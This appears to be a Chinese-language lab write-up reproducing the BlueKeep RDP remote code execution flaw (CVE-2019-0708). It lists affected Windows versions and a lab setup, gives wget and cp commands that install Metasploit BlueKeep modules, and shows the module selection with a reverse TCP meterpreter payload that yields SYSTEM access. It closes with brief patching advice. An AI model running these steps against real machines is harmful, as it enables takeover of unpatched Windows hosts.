windows RDP远程代码执行_CVE-2019-0708漏洞复现
一、漏洞概述
2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
二、漏洞影响版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp
注:Windows 8和windows10以及之后的版本不受此漏洞影响
三、环境:
目标机:win7 sp1 x64 IP:192.168.48.135 (开启3389,关闭防火墙)
攻击机: kali IP192.168.48 IP:192.168.48.138
1. 下载
我们在github上下载最新的poc, 复制的时候如果目录不存在 ,可以手动makedir
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
2. 更新我们的msf
更新以后使用reload_all重新加载0708rdp利用模块
3.搜索关于0708的poc
4. 使用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reversr_tcp
5、设置好IP
6、设置好target为3
- 多run几次,就可以成功 我们也可以看到直接是system权限
四、漏洞防护
及时打补丁
关闭3389端口
开启防火墙
- 通过
- 未通过
0 投票者